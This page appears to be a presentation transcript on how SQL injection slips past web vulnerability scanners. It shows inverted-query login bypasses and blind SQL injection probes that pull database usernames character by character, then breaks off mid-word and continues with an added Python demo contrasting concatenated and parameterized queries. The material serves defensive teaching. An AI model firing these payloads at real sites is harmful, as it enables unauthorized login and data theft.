Risk assessment for studio
ajibike
Recommended: How "·$% developers defeat the web vulnerability scanners - Presentation Transcript (Chema Alonso)

1. How ?¿$·& developers defeat the most famous web vulnerability scanners ...or how to recognize old friends. Chema Alonso, Informática64. José Parada, Microsoft Ibérica.

2. Agenda: 1.- Introduction; 2.- Inverted Queries; 3.- Arithmetic Blind SQL Injection; 4.- Time-Based Blind SQL Injection using Heavy Queries; 5.- Conclusions.

3. 1.- Introduction

4. SQL Injection is still here among us.

5. Web Application Security Consortium: Comparison. http://projects.webappsec.org/Web-Application-Security-Statistics. 12.186 sites, 97.554 bugs.

6. Need to Improve Automatic Scanning. Manual scanning is not always possible: time, confidentiality, money, money, money... We need to study new ways to recognize old-fashioned vulnerabilities in order to improve automatic scanning tools.

7. 2.- Inverted Queries

8. (empty slide)

9. Homers, how are they? Lazy. Badly trained. Poor experience in security stuff. Don't like working. Don't like computing. Don't like coding. Don't like you!

10. Flanders are left-handed.

11. Right:
   SELECT UID FROM USERS WHERE NAME='V_NAME' AND PASSWORD='V_PASSW';

12. Wrong?
   SELECT UID FROM USERS WHERE 'V_NAME'=NAME AND 'V_PASSW'=PASSWORD

13. Login Inverted Query.
   Select uid From users where 'v_name'=name and 'v_pass'=password
   http://www.web.com/login.php?v_name=Robert&v_pass=Kubica' or '1'='1
   Select uid From users where 'Robert'=name and 'Kubica' or '1'='1'=password
   FAIL

14. Login Inverted SQL Injection, an example.
   Select uid From users where 'v_name'=name and 'v_pass'=password
   http://www.web.com/login.php?v_name=Robert&v_pass='='' or '1'='1' or 'Kubica
   Select uid From users where 'Robert'=name and ''='' or '1'='1' or 'Kubica'=password
   Success

15. Blind Attacks. The attacker injects code but cannot access the data directly. However, the injection changes the behavior of the web application. The attacker then looks for differences between true code injections (1=1) and false code injections (1=2) in the response pages to extract data. Blind SQL Injection, Blind XPath Injection, Blind LDAP Injection.

16. Blind SQL Injection Attacks. The attacker injects "true where clauses" and "false where clauses". Ex: Program.php?id=1 and 1=1 / Program.php?id=1 and 1=2. The program does not return any visible data from the database, nor data in error messages. The attacker cannot see any data extracted from the database.

17. Blind SQL Injection Attacks. The attacker analyzes the response pages looking for differences between the "True-Answer Page" and the "False-Answer Page": different hashes, different HTML structure, different patterns (keywords), different linear ASCII sums, "different behavior" (for example: response time).

18. Blind SQL Injection Attacks. If any difference exists, then the attacker can extract all information from the database. How? Using "booleanization". MySQL: Program.php?id=1 and 100>(ASCII(Substring(user(),1,1))) "True-Answer Page" or "False-Answer Page"? MSSQL: Program.php?id=1 and 100>(Select top 1 ASCII(Substring(name,1,1))) from sysusers) Oracle: Program.php?id=1 and 100>(Select ASCII(Sub
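The inverted login query from slides 13 and 14, with the two payloads shown there, built the vulnerable way (string concatenation) beside the parameterized form that fixes it. This is an added example in Python with an in-memory SQLite table, not code from the presentation; the users table, the user 'Robert' and the password 'secret' are constructed for the demonstration.

```python
import sqlite3


# Constructed in-memory table standing in for the USERS table on slide 11;
# the row (1, 'Robert', 'secret') is made up for the demonstration.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (uid INTEGER, name TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'Robert', 'secret')")
    conn.commit()
    return conn


def login_concat(conn: sqlite3.Connection, v_name: str, v_pass: str):
    """Slide 12/13 'inverted' login: literal on the left, column on the right,
    assembled by string concatenation. Returns the uid or None."""
    sql = f"SELECT uid FROM users WHERE '{v_name}'=name AND '{v_pass}'=password"
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_param(conn: sqlite3.Connection, v_name: str, v_pass: str):
    """The same inverted query with bound parameters: the input is only ever a
    value, never SQL text, so the order of literal and column does not matter."""
    sql = "SELECT uid FROM users WHERE ?=name AND ?=password"
    row = conn.execute(sql, (v_name, v_pass)).fetchone()
    return row[0] if row else None


# Classic scanner payload from slide 13: the quote closes a literal that the
# scanner assumes sits on the RIGHT of the comparison, so the inverted query
# becomes  ... AND 'Kubica' or '1'='1'=password  and the login FAILs.
CLASSIC_PAYLOAD = "Kubica' or '1'='1"

# Payload from slide 14, written for the inverted layout: it closes the literal
# on the LEFT and reopens one that swallows the trailing =password.
INVERTED_PAYLOAD = "'='' or '1'='1' or 'Kubica"

if __name__ == "__main__":
    db = make_db()
    print("concat, classic payload :", login_concat(db, "Robert", CLASSIC_PAYLOAD))   # None
    print("concat, inverted payload:", login_concat(db, "Robert", INVERTED_PAYLOAD))  # 1
    print("param,  inverted payload:", login_param(db, "Robert", INVERTED_PAYLOAD))   # None
    print("param,  real password   :", login_param(db, "Robert", "secret"))           # 1
```

The point for a defender is the third line: a scanner that only sends the classic payload reports the concatenated login as safe, while parameterization makes both payloads inert regardless of how the comparison is written.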